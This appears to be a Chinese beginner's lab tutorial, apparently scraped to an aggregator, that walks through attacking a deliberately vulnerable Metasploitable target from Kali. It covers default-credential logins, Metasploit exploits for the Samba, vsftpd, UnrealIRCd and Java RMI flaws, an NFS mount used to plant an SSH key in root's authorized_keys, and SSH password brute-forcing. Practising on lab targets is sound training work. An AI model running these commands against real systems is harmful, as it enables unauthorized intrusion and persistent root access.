龙空技术网

Kali与编程:小白黑客是如何进行漏洞攻防演练的

Kali与编程 542

前言:

眼前咱们对“linux漏洞检测”大致比较讲究,姐妹们都想要分析一些“linux漏洞检测”的相关文章。那么小编也在网上汇集了一些有关“linux漏洞检测””的相关知识,希望姐妹们能喜欢,同学们一起来学习一下吧!

一、系统弱密码登录

1、在kali上执行命令行telnet 192.168.26.129

2、Login和password都输入msfadmin

3、登录成功,进入系统

4、测试如下:

二、MySQL弱密码登录:

1、在kali上执行mysql –h 192.168.26.129 –u root

2、登录成功,进入MySQL系统

3、测试效果:

三、PostgreSQL弱密码登录

1、在Kali上执行psql -h 192.168.26.129 –U postgres

2、输入密码:postgres

3、登录成功,进入postgresql系统

测试效果

四、VNC弱密码登录

1、在kali图形界面的终端中执行vncviewer 192.168.26.129

2、输入密码 password

3、登录成功,进入系统

测试效果:

五、Samba MS-RPC Shell 命令注入漏洞

利用步骤

1.在kali中执行msfconsole,启动metasploit

2.Use exploit/multi/samba/usermap_script,选择漏洞库

3.Set RHOST 192.168.160.131 设置要攻击的机器IP

4.Exploit,开始攻击

5.利用成功,执行uname –a 验证

测试效果:

六、Vsftpd源码包后门漏洞

步骤

1、在kali中执行msfconsole,启动metasploit

2、use exploit/unix/ftp/vsftpd_234_backdoor,选择漏洞

3、set RHOST 192.168.160.131

4、利用成功,执行uname –a 验证

5、测试过程:

七、UnreallRCd后门漏洞

步骤

1、在kali中执行msfconsole,启动metasploit

2、use exploit/unix/irc/unreal_ircd_3281_backdoor,选择漏洞

set RHOST 192.168.160.131 ,设置要攻击的目标IP地址

3、开始攻击

4、利用成功!使用uname –a 验证

测试效果:

Linux NFS共享目录配置漏洞

问题:在(2)中需要创建 /tmp/test目录并在目录下创建,如未创建则不能进行下一步

步骤

在kali上执行命令rpcinfo –p 192.168.26.129 ,查看nfs服务有无开启showmount –e 192.168.26.129 查看其设置的远程目录列表输入ssh-keygen 生成RSA公钥依次输入:

(1)mount –t nfs 192.168.26.129://tmp/test(预先创建),把192.168.160.131的根目录挂载到/tmp/test/下;

注:如果提示下图中错误则需要/etc/init.d/rpcbind start 来启动mount

(2)cat /root/.ssh/id_rsa.pub>>/tmp/test/root/.ssh/authorized_keys,把生成的公钥追加到靶机的authorized_keys下:

(3)ssh root@192.168.26.129,实现无密码登录

Java RMI SERVER 命令执行漏洞(1099/tcp)

1.Nmap –p 0-65535 192.168.160.131 来查看1099端口是否开启

2.进入msfconsole框架,依次输入以下命令:

1)use exploit/multi/misc/java_rmi_server

2)set RHOST 192.168.26.129(靶机的IP地址)

3)run

4)session

5)shell(进入meterpreter时执行)

十、Root用户弱口令漏洞(SSH爆破)

步骤

输入nmap –sV -O(大写) 192.168.160.131 查看SSh端口是否开启开启metasploit framework 框架,依次输入:use auxiliary/scanner/ssh/ssh_loginset RHOSTS 192.168.160.131set USERNAME rootset PASS_FILE pass.txt(字典文件,需要预先生成)set THREADS 50run

标签: #linux漏洞检测